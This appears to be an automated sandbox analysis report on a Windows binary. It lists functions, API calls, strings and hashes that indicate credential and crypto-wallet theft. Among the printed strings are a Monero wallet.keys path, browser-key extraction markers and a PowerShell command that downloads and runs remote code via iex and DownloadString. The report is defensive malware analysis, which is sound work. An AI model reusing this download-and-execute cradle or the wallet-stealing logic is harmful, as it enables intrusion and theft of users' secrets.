                      • RegCloseKey.ADVAPI32(005576B9), ref: 00557784
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      • Associated: 00000000.00000002.2174024121.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174469169.0000000000A46000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174635695.0000000000BE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174652014.0000000000BE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocateCloseOpenProcessQueryValue
                      • String ID: CurrentBuildNumber
                      • API String ID: 3225020163-1022791448
                      • Opcode ID: 16bee51e953570c8c45039db2b45897407176c75f8774393f6a1f05b6fd09a47
                      • Instruction ID: 292d2f52c82b46fda7cd745e4ecb21fef52fd798bb7d2d9fa0c603b26a19de2c
                      • Opcode Fuzzy Hash: 16bee51e953570c8c45039db2b45897407176c75f8774393f6a1f05b6fd09a47
                      • Instruction Fuzzy Hash: 9B0117B5A40308BBEB00DBE4DC49FAEBBB8FB48701F108556FA05A7291DA7455048B65
                      Function 005592E0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39fileCOMMON
                      Download Yara Rule
                      APIs
                      • CreateFileA.KERNEL32(:U,80000000,00000003,00000000,00000003,00000080,00000000,?,00553AEE,?), ref: 005592FC
                      • GetFileSizeEx.KERNEL32(000000FF,:U), ref: 00559319
                      • CloseHandle.KERNEL32(000000FF), ref: 00559327
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      • Associated: 00000000.00000002.2174024121.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174469169.0000000000A46000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174635695.0000000000BE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174652014.0000000000BE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: File$CloseCreateHandleSize
                      • String ID: :U$:U
                      • API String ID: 1378416451-4244293621
                      • Opcode ID: b06fb96695490f2d277ed62c687cc1c785d4db56b4d43b34a5565ba5e32ca69f
                      • Instruction ID: cfee92aecded88b162ce08e39543b465e4ee8bd36b1d6ad090f4dc942507a950
                      • Opcode Fuzzy Hash: b06fb96695490f2d277ed62c687cc1c785d4db56b4d43b34a5565ba5e32ca69f
                      • Instruction Fuzzy Hash: 5DF0AF74E40208FBEB10DFB4DC18F9E7BB9FB48311F21CA55BA11A72C0D67896009B44
                      Function 005540B0 Relevance: 9.1, APIs: 6, Instructions: 124registrystringCOMMON
                      Download Yara Rule
                      APIs
                      • memset.MSVCRT ref: 005540D5
                      • RegOpenKeyExA.ADVAPI32(80000001,0102E4A8,00000000,00020119,?), ref: 005540F4
                      • RegQueryValueExA.ADVAPI32(?,0102F590,00000000,00000000,00000000,000000FF), ref: 00554118
                      • RegCloseKey.ADVAPI32(?), ref: 00554122
                      • lstrcat.KERNEL32(?,00000000), ref: 00554147
                      • lstrcat.KERNEL32(?,0102F5C0), ref: 0055415B
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      • Associated: 00000000.00000002.2174024121.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174469169.0000000000A46000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174635695.0000000000BE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174652014.0000000000BE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcat$CloseOpenQueryValuememset
                      • String ID:
                      • API String ID: 2623679115-0
                      • Opcode ID: 590c240c1f3a23c0cde07b4701cb8cf0c253bc969a2b188c03c21645385ecbb3
                      • Instruction ID: 788d5956d0849b38476e53e25d0df026bbd32bc410b35bf00aa33cbf5d60ca0a
                      • Opcode Fuzzy Hash: 590c240c1f3a23c0cde07b4701cb8cf0c253bc969a2b188c03c21645385ecbb3
                      • Instruction Fuzzy Hash: FD41BAB6D401087BDB14EBA0DC5AFFD777DB788300F008559B61A56181EA755B8C8B92
                      Function 005499C0 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON
                      Download Yara Rule
                      APIs
                      • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 005499EC
                      • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00549A11
                      • LocalAlloc.KERNEL32(00000040,?), ref: 00549A31
                      • ReadFile.KERNEL32(000000FF,?,00000000,0054148F,00000000), ref: 00549A5A
                      • LocalFree.KERNEL32(0054148F), ref: 00549A90
                      • CloseHandle.KERNEL32(000000FF), ref: 00549A9A
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      • Associated: 00000000.00000002.2174024121.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174469169.0000000000A46000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174635695.0000000000BE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174652014.0000000000BE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                      • String ID:
                      • API String ID: 2311089104-0
                      • Opcode ID: 85bf32218a5a8cde99109713e77b4f2948a1f5fcafcfd9be88ecfc99463529b2
                      • Instruction ID: a57ad703dd1ff59bce20c082efda804b174ce4f8819002a61e2aa5c29e7e9215
                      • Opcode Fuzzy Hash: 85bf32218a5a8cde99109713e77b4f2948a1f5fcafcfd9be88ecfc99463529b2
                      • Instruction Fuzzy Hash: A7312D74A00209EFDB14CF95C986BEE7BB5FF48345F208159E911A7290D778A941CFA1
                      Function 0055C84E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 129COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      • Associated: 00000000.00000002.2174024121.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174469169.0000000000A46000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174635695.0000000000BE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174652014.0000000000BE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: String___crt$Typememset
                      • String ID:
                      • API String ID: 3530896902-3916222277
                      • Opcode ID: 349f81be8cdb9d23b08d44b20f9d7c0db987c867c3e467a16d8846d021dffe75
                      • Instruction ID: 1a4247895895a03e823919ae8c592546ca41c7ed7edd529cda50b05429b07b41
                      • Opcode Fuzzy Hash: 349f81be8cdb9d23b08d44b20f9d7c0db987c867c3e467a16d8846d021dffe75
                      • Instruction Fuzzy Hash: 1141D5B150079C5EDB218B248CA4BFB7FF8AB45705F1448A9ED8A86182D271AA49DF60
                      Function 00554780 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON
                      Download Yara Rule
                      APIs
                      • lstrcat.KERNEL32(?,0102F398), ref: 005547DB
                        • Part of subcall function 00558DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00558E0B
                      • lstrcat.KERNEL32(?,00000000), ref: 00554801
                      • lstrcat.KERNEL32(?,?), ref: 00554820
                      • lstrcat.KERNEL32(?,?), ref: 00554834
                      • lstrcat.KERNEL32(?,0101A888), ref: 00554847
                      • lstrcat.KERNEL32(?,?), ref: 0055485B
                      • lstrcat.KERNEL32(?,0102E748), ref: 0055486F
                        • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                        • Part of subcall function 00558D90: GetFileAttributesA.KERNEL32(00000000,?,00541B54,?,?,0056564C,?,?,00560E1F), ref: 00558D9F
                        • Part of subcall function 00554570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00554580
                        • Part of subcall function 00554570: RtlAllocateHeap.NTDLL(00000000), ref: 00554587
                        • Part of subcall function 00554570: wsprintfA.USER32 ref: 005545A6
                        • Part of subcall function 00554570: FindFirstFileA.KERNEL32(?,?), ref: 005545BD
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      • Associated: 00000000.00000002.2174024121.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174469169.0000000000A46000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174635695.0000000000BE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174652014.0000000000BE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                      • String ID:
                      • API String ID: 2540262943-0
                      • Opcode ID: 6bd2454cd91e71745834770d14c05a7739a8061b25ea5da2ea7b25e9685ad7b1
                      • Instruction ID: 917364238f3c4f99cafae1a2679d49ade54b1f4138dbc749ce9fe54ff895cede
                      • Opcode Fuzzy Hash: 6bd2454cd91e71745834770d14c05a7739a8061b25ea5da2ea7b25e9685ad7b1
                      • Instruction Fuzzy Hash: 2E3173B294020967DB10FBB0DC99EE9777CBB88701F40458AB715A6081EE7897CD8FA5
                      Function 00552C90 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                        • Part of subcall function 0055A9B0: lstrlen.KERNEL32(?,01028C68,?,\Monero\wallet.keys,00560E17), ref: 0055A9C5
                        • Part of subcall function 0055A9B0: lstrcpy.KERNEL32(00000000), ref: 0055AA04
                        • Part of subcall function 0055A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0055AA12
                        • Part of subcall function 0055A920: lstrcpy.KERNEL32(00000000,?), ref: 0055A972
                        • Part of subcall function 0055A920: lstrcat.KERNEL32(00000000), ref: 0055A982
                        • Part of subcall function 0055A8A0: lstrcpy.KERNEL32(?,00560E17), ref: 0055A905
                      • ShellExecuteEx.SHELL32(0000003C), ref: 00552D85
                      Strings
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00552D04
                      • <, xrefs: 00552D39
                      • ')", xrefs: 00552CB3
                      • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00552CC4
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      • Associated: 00000000.00000002.2174024121.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174469169.0000000000A46000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174635695.0000000000BE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174652014.0000000000BE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                      • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      • API String ID: 3031569214-898575020
                      • Opcode ID: 6ff91c324b68020fbcc8230351c50ce9e8198a4d0c4ac3470f06ba216abb055b
                      • Instruction ID: 24d1e7c0bf4614fac62893615a8166f8a75fdf57b89dc96d87fe0197a2e9524a
                      • Opcode Fuzzy Hash: 6ff91c324b68020fbcc8230351c50ce9e8198a4d0c4ac3470f06ba216abb055b
                      • Instruction Fuzzy Hash: 2D41B171C102099ADB14EFA0C8A6BEDBF78BF54301F50421AF916A7191EF746A4ECF91
                      Function 00549E10 Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 170memoryCOMMON
                      Download Yara Rule
                      APIs
                      • LocalAlloc.KERNEL32(00000040,?), ref: 00549F41
                        • Part of subcall function 0055A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0055A7E6
                        • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      • Associated: 00000000.00000002.2174024121.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174469169.0000000000A46000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174635695.0000000000BE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174652014.0000000000BE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$AllocLocal
                      • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                      • API String ID: 4171519190-1096346117
                      • Opcode ID: 9a44bf0174905c3007c56e8891412b8a451913074bd5fe92279ad49287044fa4
                      • Instruction ID: eda2ad6867c3ea36fa9ed2ebf6972a5cce994b08690ac334a45236177a8563c4
                      • Opcode Fuzzy Hash: 9a44bf0174905c3007c56e8891412b8a451913074bd5fe92279ad49287044fa4
                      • Instruction Fuzzy Hash: 02614270A50249DBDB24EFA4CC9AFEE7B75BF84304F008518F90A5F191EB746A49CB52
                      Function 005570D0 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 140COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                      • memset.MSVCRT ref: 0055716A
                      Strings
                      • sU, xrefs: 005572AE, 00557179, 0055717C
                      • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0055718C
                      • sU, xrefs: 00557111
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      • Associated: 00000000.00000002.2174024121.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174469169.0000000000A46000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174635695.0000000000BE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174652014.0000000000BE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpymemset
                      • String ID: sU$sU$65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                      • API String ID: 4047604823-2944379081
                      • Opcode ID: 47696db478d5a725ae6111997d7781f0f8b5e81daf3450a7b0c67c2e934fa61b
                      • Instruction ID: a447422ce0ed72e456a3cf6f9ee4fbe17ca95fc10c0a68db218ec40d80e22af5
                      • Opcode Fuzzy Hash: 47696db478d5a725ae6111997d7781f0f8b5e81daf3450a7b0c67c2e934fa61b
                      • Instruction Fuzzy Hash: 9E517EB0C0420D9BDB14EB90DCA9BEEBB74BF48305F5041AAE90567181EB746A8CCF54
                      Function 00557E00 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON
                      Download Yara Rule
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00557E37
                      • RtlAllocateHeap.NTDLL(00000000), ref: 00557E3E
                      • RegOpenKeyExA.ADVAPI32(80000002,0101B8B0,00000000,00020119,?), ref: 00557E5E
                      • RegQueryValueExA.ADVAPI32(?,0102E648,00000000,00000000,000000FF,000000FF), ref: 00557E7F
                      • RegCloseKey.ADVAPI32(?), ref: 00557E92
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      • Associated: 00000000.00000002.2174024121.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174469169.0000000000A46000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174635695.0000000000BE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174652014.0000000000BE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocateCloseOpenProcessQueryValue
                      • String ID:
                      • API String ID: 3225020163-0
                      • Opcode ID: ea9875ee0aac64b87c809c110d8b61b7b89ac13a2c635eeb5e030f3313882078
                      • Instruction ID: 56efb76b2cf95b8240b611862324fabffb5c27db4d9d664421e8e5140a368cad
                      • Opcode Fuzzy Hash: ea9875ee0aac64b87c809c110d8b61b7b89ac13a2c635eeb5e030f3313882078
                      • Instruction Fuzzy Hash: 481130B1A44209BBE710CF94DD5AF6BBBBCFB08711F20815AFA05A7280D77858048BA1
                      Function 00559260 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON
                      Download Yara Rule
                      APIs
                      • StrStrA.SHLWAPI(0102F140,?,?,?,0055140C,?,0102F140,00000000), ref: 0055926C
